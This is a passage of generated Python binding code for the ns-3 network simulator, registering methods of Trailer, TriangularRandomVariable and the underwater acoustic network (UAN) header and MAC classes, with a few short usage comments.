## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TriangularRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
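# Note: SequentialRandomVariable and TriangularRandomVariable implement the
# RandomVariableStream virtuals (GetValue/GetInteger). A hedged sketch of
# driving the triangular distribution from Python, assuming ns.core is
# importable and that the usual "Mean"/"Min"/"Max" attributes are configured
# through SetAttribute (inherited from ObjectBase, registered elsewhere):
#
#   import ns.core
#   tri = ns.core.TriangularRandomVariable()
#   tri.SetAttribute("Min", ns.core.DoubleValue(0.0))
#   tri.SetAttribute("Max", ns.core.DoubleValue(10.0))
#   tri.SetAttribute("Mean", ns.core.DoubleValue(5.0))
#   sample = tri.GetValue()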
def register_Ns3UanHeaderCommon_methods(root_module, cls):
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon(ns3::UanHeaderCommon const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderCommon const &', 'arg0')])
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon() [constructor]
cls.add_constructor([])
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon(ns3::UanAddress const src, ns3::UanAddress const dest, uint8_t type) [constructor]
cls.add_constructor([param('ns3::UanAddress const', 'src'), param('ns3::UanAddress const', 'dest'), param('uint8_t', 'type')])
## uan-header-common.h (module 'uan'): uint32_t ns3::UanHeaderCommon::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-common.h (module 'uan'): ns3::UanAddress ns3::UanHeaderCommon::GetDest() const [member function]
cls.add_method('GetDest',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-common.h (module 'uan'): ns3::TypeId ns3::UanHeaderCommon::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): uint32_t ns3::UanHeaderCommon::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): ns3::UanAddress ns3::UanHeaderCommon::GetSrc() const [member function]
cls.add_method('GetSrc',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-common.h (module 'uan'): uint8_t ns3::UanHeaderCommon::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## uan-header-common.h (module 'uan'): static ns3::TypeId ns3::UanHeaderCommon::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetDest(ns3::UanAddress dest) [member function]
cls.add_method('SetDest',
'void',
[param('ns3::UanAddress', 'dest')])
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetSrc(ns3::UanAddress src) [member function]
cls.add_method('SetSrc',
'void',
[param('ns3::UanAddress', 'src')])
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
return
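# Note: UanHeaderCommon is a concrete ns3::Header (source/destination
# UanAddress plus a one-byte type field), so it can be added to packets
# directly. A hedged sketch, assuming the ns.uan and ns.network modules are
# built:
#
#   import ns.network
#   import ns.uan
#   hdr = ns.uan.UanHeaderCommon()
#   hdr.SetSrc(ns.uan.UanAddress(1))
#   hdr.SetDest(ns.uan.UanAddress.GetBroadcast())
#   hdr.SetType(0)
#   pkt = ns.network.Packet()
#   pkt.AddHeader(hdr)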
def register_Ns3UanHeaderRcAck_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck::UanHeaderRcAck(ns3::UanHeaderRcAck const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcAck const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck::UanHeaderRcAck() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::AddNackedFrame(uint8_t frame) [member function]
cls.add_method('AddNackedFrame',
'void',
[param('uint8_t', 'frame')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcAck::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcAck::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcAck::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): std::set<unsigned char, std::less<unsigned char>, std::allocator<unsigned char> > const & ns3::UanHeaderRcAck::GetNackedFrames() const [member function]
cls.add_method('GetNackedFrames',
'std::set< unsigned char > const &',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcAck::GetNoNacks() const [member function]
cls.add_method('GetNoNacks',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcAck::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcAck::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::SetFrameNo(uint8_t frameNo) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNo')])
return
def register_Ns3UanHeaderRcCts_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts(ns3::UanHeaderRcCts const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcCts const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts(uint8_t frameNo, uint8_t retryNo, ns3::Time rtsTs, ns3::Time delay, ns3::UanAddress addr) [constructor]
cls.add_constructor([param('uint8_t', 'frameNo'), param('uint8_t', 'retryNo'), param('ns3::Time', 'rtsTs'), param('ns3::Time', 'delay'), param('ns3::UanAddress', 'addr')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCts::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::UanAddress ns3::UanHeaderRcCts::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCts::GetDelayToTx() const [member function]
cls.add_method('GetDelayToTx',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcCts::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcCts::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcCts::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCts::GetRtsTimeStamp() const [member function]
cls.add_method('GetRtsTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCts::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcCts::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetDelayToTx(ns3::Time delay) [member function]
cls.add_method('SetDelayToTx',
'void',
[param('ns3::Time', 'delay')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetFrameNo(uint8_t frameNo) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNo')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetRetryNo(uint8_t no) [member function]
cls.add_method('SetRetryNo',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetRtsTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetRtsTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
return
def register_Ns3UanHeaderRcCtsGlobal_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal(ns3::UanHeaderRcCtsGlobal const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcCtsGlobal const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal(ns3::Time wt, ns3::Time ts, uint16_t rate, uint16_t retryRate) [constructor]
cls.add_constructor([param('ns3::Time', 'wt'), param('ns3::Time', 'ts'), param('uint16_t', 'rate'), param('uint16_t', 'retryRate')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCtsGlobal::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcCtsGlobal::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcCtsGlobal::GetRateNum() const [member function]
cls.add_method('GetRateNum',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcCtsGlobal::GetRetryRate() const [member function]
cls.add_method('GetRetryRate',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCtsGlobal::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCtsGlobal::GetTxTimeStamp() const [member function]
cls.add_method('GetTxTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcCtsGlobal::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCtsGlobal::GetWindowTime() const [member function]
cls.add_method('GetWindowTime',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetRateNum(uint16_t rate) [member function]
cls.add_method('SetRateNum',
'void',
[param('uint16_t', 'rate')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetRetryRate(uint16_t rate) [member function]
cls.add_method('SetRetryRate',
'void',
[param('uint16_t', 'rate')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetTxTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetTxTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetWindowTime(ns3::Time t) [member function]
cls.add_method('SetWindowTime',
'void',
[param('ns3::Time', 't')])
return
def register_Ns3UanHeaderRcData_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData(ns3::UanHeaderRcData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcData const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData(uint8_t frameNum, ns3::Time propDelay) [constructor]
cls.add_constructor([param('uint8_t', 'frameNum'), param('ns3::Time', 'propDelay')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcData::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcData::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcData::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcData::GetPropDelay() const [member function]
cls.add_method('GetPropDelay',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcData::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcData::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::SetFrameNo(uint8_t frameNum) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNum')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::SetPropDelay(ns3::Time propDelay) [member function]
cls.add_method('SetPropDelay',
'void',
[param('ns3::Time', 'propDelay')])
return
def register_Ns3UanHeaderRcRts_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts(ns3::UanHeaderRcRts const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcRts const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts(uint8_t frameNo, uint8_t retryNo, uint8_t noFrames, uint16_t length, ns3::Time ts) [constructor]
cls.add_constructor([param('uint8_t', 'frameNo'), param('uint8_t', 'retryNo'), param('uint8_t', 'noFrames'), param('uint16_t', 'length'), param('ns3::Time', 'ts')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcRts::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcRts::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcRts::GetLength() const [member function]
cls.add_method('GetLength',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetNoFrames() const [member function]
cls.add_method('GetNoFrames',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcRts::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcRts::GetTimeStamp() const [member function]
cls.add_method('GetTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcRts::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetFrameNo(uint8_t fno) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'fno')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetLength(uint16_t length) [member function]
cls.add_method('SetLength',
'void',
[param('uint16_t', 'length')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetNoFrames(uint8_t no) [member function]
cls.add_method('SetNoFrames',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetRetryNo(uint8_t no) [member function]
cls.add_method('SetRetryNo',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
return
def register_Ns3UanMac_methods(root_module, cls):
## uan-mac.h (module 'uan'): ns3::UanMac::UanMac() [constructor]
cls.add_constructor([])
## uan-mac.h (module 'uan'): ns3::UanMac::UanMac(ns3::UanMac const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMac const &', 'arg0')])
## uan-mac.h (module 'uan'): int64_t ns3::UanMac::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): bool ns3::UanMac::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): ns3::Address ns3::UanMac::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): ns3::Address ns3::UanMac::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-mac.h (module 'uan'): static ns3::TypeId ns3::UanMac::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
return
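# Note: every ns3::UanMac method above is registered with
# is_pure_virtual=True, so the wrapper treats the class as abstract; the
# concrete MAC implementations registered below (UanMacAloha, UanMacCw,
# UanMacRc) provide the actual Enqueue/AttachPhy/SetForwardUpCb behaviour.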
def register_Ns3UanMacAloha_methods(root_module, cls):
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha::UanMacAloha(ns3::UanMacAloha const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacAloha const &', 'arg0')])
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha::UanMacAloha() [constructor]
cls.add_constructor([])
## uan-mac-aloha.h (module 'uan'): int64_t ns3::UanMacAloha::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): bool ns3::UanMacAloha::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): ns3::Address ns3::UanMacAloha::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): ns3::Address ns3::UanMacAloha::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-aloha.h (module 'uan'): static ns3::TypeId ns3::UanMacAloha::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanMacCw_methods(root_module, cls):
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw::UanMacCw(ns3::UanMacCw const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacCw const &', 'arg0')])
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw::UanMacCw() [constructor]
cls.add_constructor([])
## uan-mac-cw.h (module 'uan'): int64_t ns3::UanMacCw::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): bool ns3::UanMacCw::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
